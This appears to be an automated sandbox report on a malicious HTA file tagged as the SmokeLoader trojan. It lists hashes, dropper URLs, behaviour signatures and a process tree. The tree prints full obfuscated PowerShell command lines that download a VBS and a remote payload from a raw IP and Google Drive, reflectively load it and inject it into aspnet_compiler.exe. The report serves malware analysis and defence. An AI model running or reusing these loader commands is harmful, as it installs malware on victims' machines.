Analysis

  • max time kernel
    93s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2024 02:51

General

  • Target

    9af40d7dbe70e708bc2fc5cdf500f7f5389210ed8813f006ac342d6983dcd2ac.hta

  • Size

    206KB

  • MD5

    1d7fd9405d04f45b7623ceea3602ac1a

  • SHA1

    20d6bad0c83ace824ca2c962b9a16f6b2ff0afbb

  • SHA256

    9af40d7dbe70e708bc2fc5cdf500f7f5389210ed8813f006ac342d6983dcd2ac

  • SHA512

    c5ef145291e6a971497ccc1225b7ad369ea798164acdfdd03a1760cd5c435868feef43727df870cf3cb8e7d40c1046f7ae6aad0a825328148553aaa517936161

  • SSDEEP

    48:4FhWsTR/F7gNqXfjH3BrGi3JX3Brmi3Jl7uW2ZxzBKI72VVVrsBAte0oNz3Brs3K:43F97ftlvFHGxtl2VfrJ4a+pM/Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Smokeloader family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9af40d7dbe70e708bc2fc5cdf500f7f5389210ed8813f006ac342d6983dcd2ac.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Windows\SysWOW64\wInDOwSPOwErShelL\V1.0\powerSHeLL.exE
      "C:\Windows\sYStEm32\wInDOwSPOwErShelL\V1.0\powerSHeLL.exE" "PoWERSHell -EX BYpAsS -noP -W 1 -C dEvICEcREdEntIALDEPlOymENT.Exe ; ieX($(iEx('[sYstEM.TEXt.ENCODinG]'+[ChaR]58+[cHaR]0x3A+'utF8.gETstRINg([sYStEM.CONveRt]'+[ChAR]58+[chaR]0X3A+'FRombasE64STRinG('+[CHaR]0x22+'JGhDNjJTM1FsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUmRFRmluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJtQyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1RkVaaWlGZ3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1JWQWJPZWpOQ2YsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpkd1l5UyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInd0ekR6WCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29aTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaEM2MlMzUWw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEzNS4xNjYvMzQvc2VlYWdvb2RwaWN0dXJld2l0aGdyZWF0dGhpZ25zd2l0aG1lZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlYWdvb2RwaWN0dXJld2l0aGdyZWF0dGhpZ25zd2l0aG1lLnZicyIsMCwwKTtTdGFSVC1TTGVFUCgzKTtzdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2VlYWdvb2RwaWN0dXJld2l0aGdyZWF0dGhpZ25zd2l0aG1lLnZicyI='+[cHAR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpAsS -noP -W 1 -C dEvICEcREdEntIALDEPlOymENT.Exe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3004
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cojs11kr\cojs11kr.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2392
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4D4.tmp" "c:\Users\Admin\AppData\Local\Temp\cojs11kr\CSC71F69F1849554EFA88CCACF5BD1168C5.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2840
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seeagoodpicturewithgreatthignswithme.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBzSG9NZVsyMV0rJHBzSG9NRVszMF0rJ3gnKSggKCdyRXBpbWFnZVVybCA9IEk3amh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9lJysneHBvcnQ9ZG93bmxvYWQmaWQ9MVV5SHEnKyd3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIEk3ajtyRXB3ZWInKydDbGllbnQgPSBOZXctT2JqZWMnKyd0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50O3JFJysncGltYWdlQnknKyd0ZXMgPSByRXB3ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHJFcGltYWdlVXJsKTtyRXBpbWFnZVRleHQgPSBbJysnU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhyRXBpbWFnZScrJ0J5dGVzKTtyRXBzdGFydEZsYWcgPSBJN2o8PEJBU0U2NF9TVEFSVD4+STdqO3JFcGVuZEZsYWcgPSBJN2o8PEJBU0U2NF9FTkQ+Pkk3ajtyJysnRXBzdGFydEluZGV4ID0gckVwaW1hZ2VUZXh0LkluZGV4TycrJ2YockVwc3RhcnRGbGFnJysnKTtyRXBlbmRJbmRleCA9JysnICcrJ3JFcGltYWdlVGV4dC5JbmRleE9mKHJFcGVuZEZsYWcpO3JFcHN0YXJ0SW5kZXggLWdlIDAgLWFuZCByRXBlbmRJbmRleCAnKyctZ3QgckVwc3RhcnRJbmRleDtyRXBzJysndGFydEluZGV4ICs9IHJFcHN0YXJ0RmxhZy5MZW5ndGg7ckVwYicrJ2FzZTY0TGVuZ3RoID0gckVwZW5kSW5kZXggLSByRXBzdGFydEluZGV4O3JFcGJhc2U2NENvbW0nKydhbmQgPSByRXBpbWFnZVRleHQuU3Vic3RyaW5nKHJFcHN0YXJ0SW5kZXgsIHJFcGJhc2U2NExlbmd0aCk7ckVwYmFzZTY0UmV2ZXJzZWQgJysnPSAtam9pbiAocicrJ0VwYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIDRycCBGb3JFYWNoLU9iamVjdCB7IHJFcF8gfSlbLTEuLi0ockVwYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtyRXBjb21tYW5kQnl0ZScrJ3MgPSBbU3lzdGVtLkNvbnZlcnRdOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHJFcGJhc2U2NFJldmVyJysnc2VkKTtyRXBsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjJysndGlvJysnbi5Bc3NlbWJseV06OkxvYWQockVwY29tbWFuZEJ5dGVzKTtyRXB2YScrJ2lNZXRobycrJ2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0JysnTWUnKyd0aG8nKydkKEk3alZBSUknKyc3aik7ckVwdmFpTWV0aG9kLkludm9rZScrJyhyRXBudWxsLCBAKEk3anR4dC5SUkZDUkRMLzQzLzY2MS41MzEuNTQyLjI3MS8vOicrJ3B0dGhJN2osIEk3amRlc2F0aXZhZG9JN2osIEk3amRlc2F0aXZhZG9JN2osIEk3amRlc2EnKyd0aXZhZG9JN2osIEk3amFzcG5ldF9jb21waWxlckk3aiwgSTdqZGVzYXRpdmFkb0k3aiwgSTdqZGUnKydzYXRpdmFkb0k3aixJN2pkZXNhdGl2YWRvSTdqLEk3amRlc2F0aXZhZG9JN2osSTdqZGVzYXRpdmFkb0knKyc3aixJN2pkZXNhdGl2YWRvSTdqLEk3amRlc2F0aXZhZG9JN2osSTdqMUk3aixJN2pkZXNhdGl2YWRvSTdqKSk7JykuUkVQbGFDRSgoW0NIQVJdNTIrW0NIQVJdMTE0K1tDSEFSXTExMiksJ3wnKS5SRVBsYUNFKCdyRXAnLCckJykuUkVQbGFDRSgoW0NIQVJdNzMrW0NIQVJdNTUrW0NIQVJdMTA2KSxbc3RSaW5nXVtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4888
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $psHoMe[21]+$psHoME[30]+'x')( ('rEpimageUrl = I7jhttps://drive.google.com/uc?e'+'xport=download&id=1UyHq'+'wrnXClKBJ3j63Ll1t2StVgGxbSt0 I7j;rEpweb'+'Client = New-Objec'+'t System.Net'+'.WebClient;rE'+'pimageBy'+'tes = rEpwebClient'+'.DownloadData(rEpimageUrl);rEpimageText = ['+'System.Text.Encoding]::UTF8.GetString(rEpimage'+'Bytes);rEpstartFlag = I7j<<BASE64_START>>I7j;rEpendFlag = I7j<<BASE64_END>>I7j;r'+'EpstartIndex = rEpimageText.IndexO'+'f(rEpstartFlag'+');rEpendIndex ='+' '+'rEpimageText.IndexOf(rEpendFlag);rEpstartIndex -ge 0 -and rEpendIndex '+'-gt rEpstartIndex;rEps'+'tartIndex += rEpstartFlag.Length;rEpb'+'ase64Length = rEpendIndex - rEpstartIndex;rEpbase64Comm'+'and = rEpimageText.Substring(rEpstartIndex, rEpbase64Length);rEpbase64Reversed '+'= -join (r'+'Epbase64Command.ToCharArray() 4rp ForEach-Object { rEp_ })[-1..-(rEpbase64Command.Length)];rEpcommandByte'+'s = [System.Convert]::'+'FromBa'+'se64String(rEpbase64Rever'+'sed);rEploadedAssembly = [System.Reflec'+'tio'+'n.Assembly]::Load(rEpcommandBytes);rEpva'+'iMetho'+'d = [dnlib.IO.Home].Get'+'Me'+'tho'+'d(I7jVAII'+'7j);rEpvaiMethod.Invoke'+'(rEpnull, @(I7jtxt.RRFCRDL/43/661.531.542.271//:'+'ptthI7j, I7jdesativadoI7j, I7jdesativadoI7j, I7jdesa'+'tivadoI7j, I7jaspnet_compilerI7j, I7jdesativadoI7j, I7jde'+'sativadoI7j,I7jdesativadoI7j,I7jdesativadoI7j,I7jdesativadoI'+'7j,I7jdesativadoI7j,I7jdesativadoI7j,I7j1I7j,I7jdesativadoI7j));').REPlaCE(([CHAR]52+[CHAR]114+[CHAR]112),'|').REPlaCE('rEp','$').REPlaCE(([CHAR]73+[CHAR]55+[CHAR]106),[stRing][CHAR]39))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:532
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              6⤵
              • Checks SCSI registry key(s)
              PID:2116

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powerSHeLL.exE.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    e157c5088eb2e32f4977c8fab325bc74

    SHA1

    e35de58370c657d31c6a666435fc53b1912b0f09

    SHA256

    efc9fc8dcb3e177b4597674fb4632f100b29abb18190c4294d50f91a1ebdfa5f

    SHA512

    3711c23355834c857ed17b414e89b35217d48a3873286473ba14ac539a6c6826ea5ef2e2b27c517627b82cf566a98342a3ed134a8e5fcad7e31266680bc633bf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    871e7c1b24ac3e2b241e185d70d03306

    SHA1

    0f2e8c110a85d2bd6baf1638de9cc0c9e1ef0a93

    SHA256

    597202772e79a18067de40ca53e0acd3b40792014421d4a92c725402c8cf599d

    SHA512

    680c8c3088ad861904722bdccfc58d0f30b8531112f085efe3ca070c9d1ad44cbdad9faffe328c81a3c0965172a18ea50ac7f0e2361f074024105fc594cfb7c5

  • C:\Users\Admin\AppData\Local\Temp\RESD4D4.tmp

    Filesize

    1KB

    MD5

    6dd1fb3b3f5130ad378efad1d12d9e31

    SHA1

    49bf6ded26ea305b18061abb45dfa068b2fa4496

    SHA256

    196286072ad5b594f021b6fdff8f3c6c4be2ffb9da92be7accbb927ac9ec77de

    SHA512

    276928155937f2181902157e66d6158810cae11da35d5b6c92572eb4708a17423a1ae596beb7eeb4f279e5ea4ff79fedfa03710f7e9cd95d940257ea19353c6d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u4353j0y.dmx.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\cojs11kr\cojs11kr.dll

    Filesize

    3KB

    MD5

    1090841a2e36565770323a7758c8a157

    SHA1

    7ad544045ef987f18a3820e3aeb5f1d584e3e190

    SHA256

    adba3887a61e90d87f00801d5a6f21720a5c9b624c71999535d2d99e5437f268

    SHA512

    25bbeb95d5b994e9c6f517f2c1861d3c8078e50af69ed929afebf40edc60e4849000e2a9608c7081017d4413708fad9d1c02519d3666b9f3d923bcd614b4ea6e

  • C:\Users\Admin\AppData\Roaming\seeagoodpicturewithgreatthignswithme.vbs

    Filesize

    138KB

    MD5

    75c04757cc9d62cacb38fb15e5b49cca

    SHA1

    ac2c54c2dc6ae1b8355fa44ba98a1ba03675d14c

    SHA256

    7913be4378af7f7413b74feae0a7c3c63c1d9ca9ad8f5ceb0361feb5a019238f

    SHA512

    d3717706110dc781462e76e33fc1adec6cbdf8f589735f90a71bdf37ca55b64cf45e46430e08e941cfe0233c4147232ac6631fe66da2642ca5eef3cd173deaf4

  • \??\c:\Users\Admin\AppData\Local\Temp\cojs11kr\CSC71F69F1849554EFA88CCACF5BD1168C5.TMP

    Filesize

    652B

    MD5

    d506f864da15c23598291de12dca8fe7

    SHA1

    d19b55f393ec5eca73ae68dd00bf20328471843e

    SHA256

    ae57e5b35096bf2d39831904882f6afbab463e9b03fc494b21bdcee70b4e18cb

    SHA512

    6b0fc730a8aa1fa6a213aa77519608524f188ff1b2edc9ad5c3f32b78387e8ee436351e6e5e0dde58feba2403edea83c1f8b6062e3006856eefb07e1778ce763

  • \??\c:\Users\Admin\AppData\Local\Temp\cojs11kr\cojs11kr.0.cs

    Filesize

    478B

    MD5

    ada4c67587bb2ea7318e1cb59626f064

    SHA1

    f479ee06a28583f07107c310848f266b3ffc85f5

    SHA256

    f6d41138084df8aedcf8852b9f0082cb6fc228c04cd56ed5f0f97bc4141b9029

    SHA512

    59524799edbfcdab013e910273a991dc99d7c7f0283955b50dba1712ad59172299d99187bd0e708b5433eeb34742573bdcbdd41eb5af49d276f0fe5c87810bc8

  • \??\c:\Users\Admin\AppData\Local\Temp\cojs11kr\cojs11kr.cmdline

    Filesize

    369B

    MD5

    b3c061770d239a4a282c927a629e2592

    SHA1

    dcd8bf453e17291cfe6bd17e123809aedaa011bc

    SHA256

    7585c715a39f9219ee547f1f9d17439ba1090094e5a9102dfc674c971974aca5

    SHA512

    a469a59581c4f569473941bed5db0fa6d5df9253b6a7dd5476a67dcdae44e6224b62d0a5d0cbab2b4f47cc0f72464dfa48e4f7677f035fc9bfbce881f973f0c8

  • memory/448-73-0x0000000007510000-0x0000000007532000-memory.dmp

    Filesize

    136KB

  • memory/448-4-0x0000000070AE0000-0x0000000071290000-memory.dmp

    Filesize

    7.7MB

  • memory/448-1-0x0000000002840000-0x0000000002876000-memory.dmp

    Filesize

    216KB

  • memory/448-81-0x0000000070AE0000-0x0000000071290000-memory.dmp

    Filesize

    7.7MB

  • memory/448-2-0x00000000053A0000-0x00000000059C8000-memory.dmp

    Filesize

    6.2MB

  • memory/448-3-0x0000000070AE0000-0x0000000071290000-memory.dmp

    Filesize

    7.7MB

  • memory/448-19-0x0000000006180000-0x00000000061CC000-memory.dmp

    Filesize

    304KB

  • memory/448-74-0x00000000083F0000-0x0000000008994000-memory.dmp

    Filesize

    5.6MB

  • memory/448-0-0x0000000070AEE000-0x0000000070AEF000-memory.dmp

    Filesize

    4KB

  • memory/448-72-0x0000000070AE0000-0x0000000071290000-memory.dmp

    Filesize

    7.7MB

  • memory/448-71-0x0000000070AEE000-0x0000000070AEF000-memory.dmp

    Filesize

    4KB

  • memory/448-65-0x00000000066F0000-0x00000000066F8000-memory.dmp

    Filesize

    32KB

  • memory/448-5-0x00000000052A0000-0x00000000052C2000-memory.dmp

    Filesize

    136KB

  • memory/448-6-0x0000000005A40000-0x0000000005AA6000-memory.dmp

    Filesize

    408KB

  • memory/448-7-0x0000000005AB0000-0x0000000005B16000-memory.dmp

    Filesize

    408KB

  • memory/448-18-0x0000000006140000-0x000000000615E000-memory.dmp

    Filesize

    120KB

  • memory/448-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp

    Filesize

    3.3MB

  • memory/532-102-0x0000000007F70000-0x00000000080C8000-memory.dmp

    Filesize

    1.3MB

  • memory/532-103-0x00000000080D0000-0x000000000816C000-memory.dmp

    Filesize

    624KB

  • memory/2116-104-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/3004-42-0x0000000007720000-0x0000000007D9A000-memory.dmp

    Filesize

    6.5MB

  • memory/3004-40-0x0000000006F80000-0x0000000006F9E000-memory.dmp

    Filesize

    120KB

  • memory/3004-45-0x0000000007370000-0x0000000007406000-memory.dmp

    Filesize

    600KB

  • memory/3004-44-0x0000000007140000-0x000000000714A000-memory.dmp

    Filesize

    40KB

  • memory/3004-43-0x00000000070E0000-0x00000000070FA000-memory.dmp

    Filesize

    104KB

  • memory/3004-50-0x0000000007360000-0x0000000007368000-memory.dmp

    Filesize

    32KB

  • memory/3004-41-0x0000000006FA0000-0x0000000007043000-memory.dmp

    Filesize

    652KB

  • memory/3004-46-0x00000000072E0000-0x00000000072F1000-memory.dmp

    Filesize

    68KB

  • memory/3004-29-0x0000000006F40000-0x0000000006F72000-memory.dmp

    Filesize

    200KB

  • memory/3004-30-0x000000006D3A0000-0x000000006D3EC000-memory.dmp

    Filesize

    304KB

  • memory/3004-47-0x0000000007310000-0x000000000731E000-memory.dmp

    Filesize

    56KB

  • memory/3004-48-0x0000000007320000-0x0000000007334000-memory.dmp

    Filesize

    80KB

  • memory/3004-49-0x0000000007430000-0x000000000744A000-memory.dmp

    Filesize

    104KB

  • memory/4888-91-0x00000000062B0000-0x0000000006604000-memory.dmp

    Filesize

    3.3MB